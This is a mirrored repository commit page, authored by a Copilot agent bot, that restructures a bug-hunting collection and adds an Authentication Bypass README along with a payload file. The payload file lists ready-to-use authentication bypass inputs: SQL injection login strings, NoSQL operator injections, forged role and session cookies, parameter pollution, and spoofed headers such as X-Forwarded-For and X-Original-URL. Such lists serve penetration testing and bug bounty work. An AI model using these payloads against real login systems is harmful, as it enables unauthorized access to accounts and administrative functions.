0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity

Restructure repository: Remove OWASP categorization, organize by vulnerability type

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-04 19:01:04 +00:00
parent 274734e91a
commit ba72efbc5e
46 changed files with 341 additions and 323 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Authentication-Bypass/README.md
+18
View File
@@ -0,0 +1,18 @@
# Authentication Bypass
## Description
Authentication bypass vulnerabilities allow an attacker to gain access to a system without providing valid credentials. These vulnerabilities can result from flawed authentication logic, improper session management, or weak authentication mechanisms.
## Common Attack Vectors
- Login forms
- Password reset functionality
- Multi-factor authentication
- Session tokens
- JWT tokens
- OAuth flows
## Testing Approach
Test authentication mechanisms for logical flaws, parameter manipulation, and bypass techniques that allow unauthorized access.
## Payloads
See `auth-bypass-payloads.txt` for a comprehensive list of authentication bypass payloads and techniques.
Authentication-Bypass/auth-bypass-payloads.txt
+47
View File
@@ -0,0 +1,47 @@
# Authentication Bypass Payloads
# SQL injection authentication bypass
admin' --
admin' #
admin'/*
' OR '1'='1' --
' OR 1=1--
admin' OR '1'='1
') OR ('1'='1
' OR 'x'='x
admin') OR ('1'='1'--
# NoSQL authentication bypass
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$in": ["admin", "administrator"]}, "password": {"$gt": ""}}
# JSON payload manipulation
{"username":"admin","password":"admin","role":"admin"}
{"username":"admin","password":"wrong","isAdmin":true}
{"username":"admin","is_authenticated":true}
# Session manipulation
PHPSESSID=admin
session_id=00000000-0000-0000-0000-000000000001
token=admin_token
auth=true
# Parameter pollution
username=attacker&username=admin
user=normal&user=admin
# Cookie manipulation
admin=true
isAdmin=1
role=admin
authenticated=true
user_level=admin
# Header injection
X-Forwarded-For: 127.0.0.1
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1